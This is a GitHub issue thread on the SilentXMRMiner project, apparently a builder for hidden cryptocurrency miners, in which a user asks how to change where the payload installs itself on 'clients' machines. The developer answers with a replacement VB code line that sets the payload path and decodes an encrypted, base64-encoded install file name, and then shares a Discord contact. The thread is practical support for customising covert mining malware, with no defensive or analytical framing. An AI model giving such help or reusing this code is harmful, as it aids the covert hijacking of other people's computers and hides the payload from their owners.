### ISSUE TITLE
Customise the Save Path

### ISSUE THREAD

**Issue by marbletissue** [UnamSanctam/SilentXMRMiner#423]
Is it possible to customise the Save Path?
Some clients have a specific 'safe' location which I would like to use as the save path.
Thanks

**Comment by UnamSanctam** [comment]
Yes you can change PayloadPath to change where it should install itself, it's beneath this line:
https://github.com/UnamSanctam/SilentXMRMiner/blob/0b91bfd65959314c4ff36b209041e3bf26d2b7c2/SilentXMRMiner/Codedom.vb#L271

**Comment by marbletissue** [comment]
> 
> 
> Yes you can change PayloadPath to change where it should install itself, it's beneath this line:
> 
> https://github.com/UnamSanctam/SilentXMRMiner/blob/0b91bfd65959314c4ff36b209041e3bf26d2b7c2/SilentXMRMiner/Codedom.vb#L271

Thanks for your quick reply!
So do I replace " & installdir & " on line 273 with my directory?
I.e:
" & C:\Install & " 
Or am I looking at the wrong thing?
Thanks

**Comment by UnamSanctam** [comment]
Yes you would replace installdir, if you want to place it in C:\Install then the best code would be `"Path.Combine(Path.GetPathRoot(Environment.SystemDirectory), \"Install\")"`

**Comment by marbletissue** [comment]
> 
> 
> Yes you would replace installdir, if you want to place it in C:\Install then the best code would be `"Path.Combine(Path.GetPathRoot(Environment.SystemDirectory), \"Install\")"`

Do I replace line 273 with:
`stringb.Replace "Path.Combine(Path.GetPathRoot(Environment.SystemDirectory), \"Install\")"`

Or replace `" & C:\Install & "` with `"Path.Combine(Path.GetPathRoot(Environment.SystemDirectory), \"Install\")"
`

I  assume I need to keep 'Install to System32' ticked right as it will be using this new directory instead of System32?

Thank you

**Comment by UnamSanctam** [comment]
If you never intend to use the "Install to System32" function then you can just replace the whole If block with:
`stringb.Replace("PayloadPath", "System.IO.Path.Combine(Path.Combine(Path.GetPathRoot(Environment.SystemDirectory), \"Install\"), Encoding.ASCII.GetString(RAES_Method(Convert.FromBase64String(" & Chr(34) & F.EncryptString(F.txtInstallFileName.Text) & Chr(34) & "))))")`

**Comment by marbletissue** [comment]
> 
> 
> If you never intend to use the "Install to System32" function then you can just replace the whole If block with:
> `stringb.Replace("PayloadPath", "System.IO.Path.Combine(Path.Combine(Path.GetPathRoot(Environment.SystemDirectory), \"Install\"), Encoding.ASCII.GetString(RAES_Method(Convert.FromBase64String(" & Chr(34) & F.EncryptString(F.txtInstallFileName.Text) & Chr(34) & "))))")`

Marvellous.. now the fun begins with learning about compiling source code. Thanks a bunch dude. Do you have a discord server or anywhere else people can reach you?

**Comment by UnamSanctam** [comment]
I have a personal Discord at: Unam Sanctam#3135

**Comment by marbletissue** [comment]
> 
> 
> I have a personal Discord at: Unam Sanctam#3135

Nice dude. Just added you
